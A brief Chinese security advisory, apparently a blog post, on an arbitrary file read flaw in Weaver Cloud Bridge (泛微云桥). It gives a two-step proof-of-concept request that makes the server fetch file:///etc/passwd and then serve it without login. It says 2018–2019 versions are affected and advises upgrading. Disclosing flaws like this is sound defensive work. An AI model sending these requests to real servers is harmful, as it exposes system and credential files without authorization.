泛微云桥任意文件读取漏洞[尽快升级]
0x00 泛微云桥
来不及解释了,看图
用的人很多。
0X01 漏洞验证
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/3e2598b16871455286ebf95c3e8e118c
0X02 漏洞影响范围
几乎影响2018-2019全版本
0X03 缓解措施
最新版本已修复该漏洞,请尽快升级。
长按下方图片关注我们: